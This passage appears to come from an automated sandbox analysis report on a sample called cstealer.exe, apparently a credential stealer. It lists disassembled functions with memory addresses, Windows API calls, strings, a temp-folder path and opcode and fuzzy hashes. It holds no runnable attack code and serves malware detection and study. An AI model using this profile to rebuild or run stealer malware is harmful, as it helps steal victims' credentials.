                                                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                            • Instruction Fuzzy Hash: 84519E721092808EEF748FAA958835977A0FB54B84F24AD15FA5D47FD6EB38D4A1CF00
                                                                                                                                                            Function 00000271DC64A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                            • Instruction ID: d5030cd09382782bfaa25b91a3660d407190a467628e8a9da427fda9b109dacd
                                                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                            • Instruction Fuzzy Hash: 3351823210D280DEEB748F999448359B7A2FB55B88F284519EB5D87B96DB38D461CF00
                                                                                                                                                            Function 00000271DC648405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                            • Instruction ID: afd3c6251a8893efea480c8f7e57ff5e6f96bbe7386fbae317ce84eb0a2c0995
                                                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                            • Instruction Fuzzy Hash: A551B43271F6008EDBA8DF59E408B58B796FB58B9CF508A24DA1E83748E734D9508F04
                                                                                                                                                            Function 00000271DC6483E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                            • Instruction ID: d5ce4a7f1e9637058529fd338cc1145042102bdc5604ae50e7a4d2a938fe939e
                                                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                            • Instruction Fuzzy Hash: 7831FF3221E740CEE764DF59E84C719B7A6FB48B88F148A14EE4E83784DB38C960CB04
                                                                                                                                                            Function 00007FF6957E2870 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                            • API String ID: 1878133881-2410924014
                                                                                                                                                            • Opcode ID: bd3b1ec170c9362c6821fd135409a0077202d763314442d1f4ebee1409f7e8bb
                                                                                                                                                            • Instruction ID: bc4ccfc6182ad3c099d736b680732b6ea221787001fe8a5b67153d288a668f2c
                                                                                                                                                            • Opcode Fuzzy Hash: bd3b1ec170c9362c6821fd135409a0077202d763314442d1f4ebee1409f7e8bb
                                                                                                                                                            • Instruction Fuzzy Hash: AC31967262969281E630DB20E4416EAA3E4FF84FC4F804176E78D87A99DF3CDB05CB40
                                                                                                                                                            Function 00007FF6957E4340 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF6957E8DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6957E2A9B), ref: 00007FF6957E8E1A
                                                                                                                                                            • CreateFileW.KERNEL32(00000000,?,?,00007FF6957E3FB9,?,00007FF6957E39CA), ref: 00007FF6957E43A8
                                                                                                                                                            • GetFinalPathNameByHandleW.KERNEL32(?,?,00007FF6957E3FB9,?,00007FF6957E39CA), ref: 00007FF6957E43C8
                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00007FF6957E3FB9,?,00007FF6957E39CA), ref: 00007FF6957E43D3
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Handle$ByteCharCloseCreateFileFinalMultiNamePathWide
                                                                                                                                                            • String ID: \\?\
                                                                                                                                                            • API String ID: 2226452419-4282027825
                                                                                                                                                            • Opcode ID: 73aa29fffb20bf18054ec36f2ff632c499c886adceaf3567ccea49c9f56a016a
                                                                                                                                                            • Instruction ID: f1d76e19a788cb8e198a95cd2a77ee028749d14a0d9dc928e760ea081c2af9f4
                                                                                                                                                            • Opcode Fuzzy Hash: 73aa29fffb20bf18054ec36f2ff632c499c886adceaf3567ccea49c9f56a016a
                                                                                                                                                            • Instruction Fuzzy Hash: 1521B172B0865145E730DB21F9443EAA291EB89BD4F440232DF4D87AA4EF3CDA48CB00
                                                                                                                                                            Function 00007FF6957FD350 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                            • Opcode ID: f3307fa9b22cd1c245fea77c51432e5876b76cda8032067fabe2ab74fde9908f
                                                                                                                                                            • Instruction ID: 0cbebd5adc62fe0d1ae27a8ab59aebceb524552986dddbe7d0208d469a1c34e5
                                                                                                                                                            • Opcode Fuzzy Hash: f3307fa9b22cd1c245fea77c51432e5876b76cda8032067fabe2ab74fde9908f
                                                                                                                                                            • Instruction Fuzzy Hash: EBD1E072B08A8189E721CF79C4402EC37B6FB45BD8B144276DE5D9BB99DE38DA06D340
                                                                                                                                                            Function 00000271DC682058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                            • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                            • Instruction ID: 6c5554cca6a16e254e9b163669e04fbf882a3abb5ec5679f3e09f4265b8143ee
                                                                                                                                                            • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                            • Instruction Fuzzy Hash: BFD1F2B271AA808DE722CFA9D44439D37B1FF54798F104615CE5E97BD9DA38C426CB40
                                                                                                                                                            Function 00000271DC6714A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$Free
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3168794593-0
                                                                                                                                                            • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                                                                                            • Instruction ID: 3352ffe72e3efc369b5a0ca8369f20b4aacd0cfc086edd323988c492ac5d5037
                                                                                                                                                            • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                                                                                            • Instruction Fuzzy Hash: 39015272505F90CAD714DFEAE90814A77A0FF48F81F444825DB8E4376ADE38C061CB40
                                                                                                                                                            Function 00007FF6957FDD10 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6957FDCFB), ref: 00007FF6957FDE2C
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6957FDCFB), ref: 00007FF6957FDEB7
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                            • Opcode ID: e5bc4118b78d7803f2849d3b40dbb6165d02ed41efd1a206ffcb3739746c0941
                                                                                                                                                            • Instruction ID: 5543b8ad1d995437a94abdd32c3a8f0438c524375396cb0b126cfec7eb59ef7b
                                                                                                                                                            • Opcode Fuzzy Hash: e5bc4118b78d7803f2849d3b40dbb6165d02ed41efd1a206ffcb3739746c0941
                                                                                                                                                            • Instruction Fuzzy Hash: 0491D072E1865295F770DF6594406BD2BE0FB54F88F5441BADE0EABA84CF38D942E700
                                                                                                                                                            Function 00000271DC682980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                            • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                            • Instruction ID: 6062b001dabd4ada579cf639902935512735a1641b87375113e7a8c770363219
                                                                                                                                                            • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                            • Instruction Fuzzy Hash: 7E91B4B271A6508DF7729FAD94483AE2BA0BF44B88F144919DE0E577D5DB3CC4A6CB00
                                                                                                                                                            Function 00007FF6958004DC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                            • Opcode ID: a806384fd3dbc637569f566945d79e9d0f9a49a7dde5cce1babac435a7d8ed95
                                                                                                                                                            • Instruction ID: 6bb472fb638e9d663cf3fd8015bda81d6e1a85117fff029737a65d5f0fc4dd58
                                                                                                                                                            • Opcode Fuzzy Hash: a806384fd3dbc637569f566945d79e9d0f9a49a7dde5cce1babac435a7d8ed95
                                                                                                                                                            • Instruction Fuzzy Hash: B6512B72F16621C6EB34CF359A416FC27E2EB40B58F900176ED2E926E5DF38E8418700
                                                                                                                                                            Function 00007FF6957F6044 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                            • Opcode ID: 96091dbd27bcc0a8deeeb26956a1675b21701702191f3790d8b7488761ccdccb
                                                                                                                                                            • Instruction ID: e428592702259261ccd39b5ceae3f7aa9d8f079c552e149e4d0e8e58e7707030
                                                                                                                                                            • Opcode Fuzzy Hash: 96091dbd27bcc0a8deeeb26956a1675b21701702191f3790d8b7488761ccdccb
                                                                                                                                                            • Instruction Fuzzy Hash: DE515D22E186418AFB20DFB1E9503BD27F1EB48F58F108575DE0D8B68ADF38DA459741
                                                                                                                                                            Function 00007FF6957EC7A0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                            • Opcode ID: 9121cd0992376079c28b7b15cfb2bb882a77f2b3c78bb4ce64e2c22522254d02
                                                                                                                                                            • Instruction ID: 90369e0c8914865a00980155058f42c6a2a1e2684b793bd2abc81fa57976f8a1
                                                                                                                                                            • Opcode Fuzzy Hash: 9121cd0992376079c28b7b15cfb2bb882a77f2b3c78bb4ce64e2c22522254d02
                                                                                                                                                            • Instruction Fuzzy Hash: 9F111826B15B158AEB10CF70E9542B833A4FB19B58F441E31DA6D87BA4DF78E9548340
                                                                                                                                                            Function 00000271DC67253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileType
                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                                                            • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                            • Instruction ID: cc50ad4d6de62d2f2fc1a9096f9cef3bcda799524b02dbb677603e192e6a5001
                                                                                                                                                            • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                            • Instruction Fuzzy Hash: 2671E7362097818AEF36DFAD99483AA6794FB85B84F540C26DD0D53FC9FE39C6518B00
                                                                                                                                                            Function 00000271DC649E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CallTranslator
                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                            • API String ID: 3163161869-2084237596
                                                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction ID: 99d51d8c1563c024a6a4003a21456af2e210fd5019e2bf33a84d5193e606a3d7
                                                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction Fuzzy Hash: AA617D3360EB448AEB20DFA9D44479DB7A6FB48B88F144615EF4D17B99DB38D066CB00
                                                                                                                                                            Function 00000271DC672330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileType
                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                                                            • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                            • Instruction ID: 8ab49c1efad89ae9f952b3e375ca7155581638904d842669b19501a56b321b67
                                                                                                                                                            • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                            • Instruction Fuzzy Hash: 8151CD7220E78189FA368FADA09C3AA6751FF85B40F440D25DE4D13FC9FA39C5648B40
                                                                                                                                                            Function 00007FF695806A6C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                            • String ID: ?
                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                            • Opcode ID: f890908d659084ad7121073ce0088269a90ad82ae80dac5e2e3914c615d8a80e
                                                                                                                                                            • Instruction ID: 99111d3a34924b7afd2fabdb5fd14e3016951b4f41c82dcd6357cf6c8786ee18
                                                                                                                                                            • Opcode Fuzzy Hash: f890908d659084ad7121073ce0088269a90ad82ae80dac5e2e3914c615d8a80e
                                                                                                                                                            • Instruction Fuzzy Hash: 4C414952A0926245FB709B36F6113BA66D0FB80FA4F144276EE5D86AD9DF3CD841C700
                                                                                                                                                            Function 00007FF6957F9DC8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6957F9DFA
                                                                                                                                                              • Part of subcall function 00007FF6957FB700: HeapFree.KERNEL32(?,?,?,00007FF695803B72,?,?,?,00007FF695803BAF,?,?,00000000,00007FF695804075,?,?,00000000,00007FF695803FA7), ref: 00007FF6957FB716
                                                                                                                                                              • Part of subcall function 00007FF6957FB700: GetLastError.KERNEL32(?,?,?,00007FF695803B72,?,?,?,00007FF695803BAF,?,?,00000000,00007FF695804075,?,?,00000000,00007FF695803FA7), ref: 00007FF6957FB720
                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6957EC335), ref: 00007FF6957F9E18
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                            • API String ID: 3580290477-834118082
                                                                                                                                                            • Opcode ID: c42a6c659c5db1ae71af4eb7c2a93e6566414c7d452b3721f18450dfb04df98c
                                                                                                                                                            • Instruction ID: 1d74c0cacb6b9c87f1dcefeeb9fea926d01cb3ea06e9dad0b99ebdffd4793235
                                                                                                                                                            • Opcode Fuzzy Hash: c42a6c659c5db1ae71af4eb7c2a93e6566414c7d452b3721f18450dfb04df98c
